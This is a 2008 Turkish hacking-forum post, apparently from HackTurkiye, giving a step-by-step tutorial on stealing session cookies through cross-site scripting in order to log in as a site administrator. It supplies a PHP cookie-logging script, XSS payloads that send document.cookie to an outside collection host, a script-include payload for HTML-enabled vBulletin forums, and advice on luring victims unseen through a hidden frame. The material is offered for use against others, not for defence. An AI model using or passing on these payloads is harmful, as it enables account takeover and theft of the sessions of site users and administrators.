» Kullanıcı Arabirimi «

Üye Girişi Yapmadınız !
Kullanıcı Adı :

Şifre :

Beni Hatırla ?


» Site Ayrıntıları «

» HackTurkiye TeaM

O Şimdi AskerOn/Off
Neo
System RooTDurum
DamaR
K@NUNSUZ
RootDurum
BLaDe
AdminstratorDurum
TraYN
Co AdminDurum
İnspector AdminDurum
MucuS
SüpervisörDurum
CArtEL
DexteR
Süper ModeratörDurum
$yn3rgy*
ModeratörDurum
desperado92
metalica55
redgen
savass18
Tr.Cocuqq
Hack TeamDurum
bybadboy

» Online Üyeler :«

» Shell «


» Istatistlik«

HTT İstatistlik

» Toplam: 18974 Kayıtlı Üye
» Yasaklı: 347 Üye
» Toplam Gösterim: 6582161
» Forum Konusu: 24295
» Forum Mesajı: 115822
» Toplam Haber: 21
» Toplam Dosya: 44
» Toplam Döküman: 79

 

» Forum Kuralları «

1-) Büyük Harfle Yazı Yazmak Bağırmak Anlamına Gelmektedir..Bu Nedenle Sadece Cümle Baslarında KuLLanıLaBiLir..!
2-) Küfürler,Ahlaksız Sözler Kesinlile Yasaktır..! [Aksi Takdirde Banlanacaksınız..!
3-) Üyeleri Assalııcak Sözler Yasaktır...
4-) Yapılan Emek Kötü Dahi Olsa Önce Saygı Önce Teşekkür Sonra Eleştiri Lütfen Sağduyulu Olun..
Yazar Mesaj   #1188  2008-10-27 21:03 GMT  
Yeni Üye
Gender_Bay Online Durum
Şehir: K.A.R.A.N.L.I.K.T.A.Y.I.M..::..::
Toplam 375 Konu Yazmış
Toplam 1860 Mesaj Yazmış
Tecrube: 80%
Ruh Hali: Kızgın
Kullanıcı Puanı : 2990
Takım : Galatasaray
Şehir: K.A.R.A.N.L.I.K.T.A.Y.I.M..::..::
Ülke:
Meslek: B.O.R.D.O. B.E.R.E.L.İ..::..::..::..::..::
Yaş: 18


Cookie Nedir?

Cookie nedir ilk önce bunu tanımlayalım örneklerle;Cookie bizi sitelerde kimliğimizi belirlemeye yarıyan .txt dosyalarıdır.Örneğin bir siteye üye oluruz ve beni hatırla seçeneği olurya bildiğiniz gibi,beni hatırla diyerek login olduğumuzda site Pc'mize bir cookie atar.Bu Cookie ile bizim yöneticimi,usermi olduğumuzu tanımlar yada başka birşey.Örneğin oylamalardada bu şekildede olabilir.Oylamayı atarsınız bakmışsınız Pc'nizde bir Cookie.Bir daha oylama yapmaya kalktığınızda Pcnizdeki Cookie harekete geçerek engelliyecektir.
Ne işimize yarar

Cookie çalmak ne işimize yarar,biz bir user seviyesindeyken bir yöneticinin cookiesini almaya kalkarsak onun cookiesi üst seviye olacağından bizimkisi ile değişince doğal olarak biz admin olarak girmiş oluruz ve yapıcağımızı yaparız.

Cookieyi nasıl çalarız?

-Açığın olduğu alan tespit edilir; Açığın olduğu alanı bulmak için örneğin forumlarda html/java yiyen bölgelere deneme yapılır çeşitli kodlarla.İmza altına atarak olabilir,çeşitli türlerde olabilir.
En azından şunu deniyebilirsiniz; ********>javascript:alert(document.cookie);</script> Bu kod JavaScript dilinde alert uyarı demek ,cookie parametresi ile birleşince o anki cookieni ekrana yansıtır sadece seninkini tabi.Baktın oluyor daha tehlikelisin denersin.

-Bir script ile Cookienin loglanması sağlanır;Aşağıda Cookieyi çalmak için gerekli scripti yazacağız.
-Açığın olduğu yere bir script enjekte edilir;Cookie bilgisini gönderecek alert gibi
-Kurbanın o Url'ye veya sayfaya bir şekilde girmesi sağlanır;Direk link veremieğinize göre(yasaksa veririz) bir frame içinde olabilir çeşitli yollarla deniyebilirsiniz.Hele forum gibi alanlarda direk verirsiniz görünmez çünki.

Uygulamaya geçelim..

Kod:

<?php
şfilename = getcwd()."\\loglarburada.txt";


if(!file_exists(şfilename)){
touch(şfilename);
chmod(şfilename, 0666);
}

if (isset(ş_GET["cookie"]))
{
if (!şhandle = fopen(şfilename, 'a'))
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
else
{
if (fwrite(şhandle, "\r\n" . ş_GET["cookie"]) === FALSE)
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
}
echo "Log başarıyla girildi...";
fclose(şhandle);
exit;
}
echo "Hani loglayacağımız parametre?";
exit;
?>


Yukarıdaki bir Php scriptimizdir Cookieyi loglamaya yarıyacak.Peki ne diyor scripti loglarburada.txt diye yeni bir .txt belgesi oluştur ve buraya cookieyi yaz diyor.
Cookienin yazılabilmesi için ChMod777 yani yazma izninde olması gerekiyor anlamına gelir.

Cookieyi şu parametre ile alacağız;

Kod:

********>window.navigate("http://xx.com/cookie.php?cookie="+document.cookie)</script>

Nasılmı dediğinizi duyuyorum,biraz örneklere geçelim.
Şimid mesela bir sitede denemeler yapıyoruz örneğin haber sayfası diyelim şu şekilde bir url war xx.com/haberdetay.asp?id=1
Ewt biz bunu ;

xx.com/haberdetay.asp?id=********>javascript:alert(docume n t.cookie);</script>
Şu şekilde bir kontrol ettiririz bakalım <; gibi taglar yasaklanmışmı diye ekranda cookie gösteriyorsa denememizi yapabiliriz.
Yanlız timeouttanda script düşebilir,kesin çalışacak die birşey yok.
E buldukta napıcağız biz bunu,bir frame içinde kurbanı çaktırmadan bu urlye sokacaksınız hangi urlye?Xss yedirdiğiniz yere yani;

Kod:

xx.com/haberdetay.asp?id=********>window.navigate("http://xx.com/cookie.php?cookie="+document.cookie)</script>

HTML Acık Vbulletinlerdede Cookie CekebiLirsiniz

Kod:
******** src="http://sizinpage.com/log.php></script>

sekLınde

HTML Acık Vbulletin buLmak Icın Google Araması ;



-= Üye Olmadan İndirme Linkini Göremessiniz =-
Üyel Olmak İçin Tıklayiniz, .

l%3Ashowthread.php&btnG=Ara&meta=

__________________
SERSERİ ASIK

ERCAN & DİLARA__LOVE__13.11.2008 __ 21:33:56

HACKER & CRAKCER


EFSANELER ÖLMEZ SADECE ŞEKİL DEĞİŞTİRİRLER BY FUNKY_STİLL
Visit user homepage   

Hack Anti Pkk Domain Hack Email Hack Flood Ddos Ftp Hack Hack Hack Sitesi Hacker Hack Prgoramlari Ldu Ve Seditio Hack MSn Hack Nuke Hack Web Hack CuteNewsHack vBulletin Hack Phpbb Hack Smf Hack Joomla Hack MkPortal Hack Vb Hack phpBB3 Hack MyBB Hack XOOPS Hack WordPress Hack UseBB Hack Heck hack+hack hack+hacker TurkHacker
 

Anti Pkk , Domain Hack , Email Hack , Flood Ddos , Ftp Hack , Hack , Hack Sitesi , Hacker , Hack Prgoramları , Ldu Ve Seditio Hack ,MSn Hack , Nuke Hack , Web Hack , CuteNewsHack , vBulletin Hack , Phpbb Hack , Smf Hack , Joomla Hack , MkPortal Hack , Vb Hack , phpBB3 Hack , MyBB Hack , XOOPS Hack , WordPress Hack , UseBB Hack , Heck , hack+hack , hack+hacker , TurkHacker


RSS

Copyright© 06-07 HackTurkiye.CoM İnc. All Rights Reserved
Güvenlik , Kurye , Sultanbeyli , Rap , Forum , PSP , Rapid
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] [27] [28] [29] [30] [31] [32] [33] [34] [35] [36] [37] [38] [39] [40] [41] [42] [43] [44] [45] [46] [47] [48] [49] [50] [51] [52] [53] [54] [55] [56] [57] [58] [59] [60] [61] [62] [63] [64] [65] [66] [67] [68] [69] [70] [71] [72] [73] [74] [75] [76] [77] [78] [79] [80] [81] [82] [83] [84] [85] [86] [87] [88] [89] [90] [91] [92] [93] [94] [95] [96] [97] [98] [99] [100] [101] [102] [103] [104] [105] [106] [107] [108] [109] [110] [111] [112] [113] [114] [115] [116] [117] [118] [119] [120] [121] [122] [123] [124] [125] [126] [127] [128] [129] [130] [131] [132] [133] [134] [135] [136] [137] [138] [139] [140] [141] [142] [143] [144] [145] [146] [147] [148] [149] [150] [151] [152] [153] [154] [155] [156] [157] [158] [159] [160] [161] [162] [163] [164] [165] [166] [167] [168] [169] [170]
Made in Turkey
[ 38.103.63.59 İp Numaranız Kayıt Edildi ]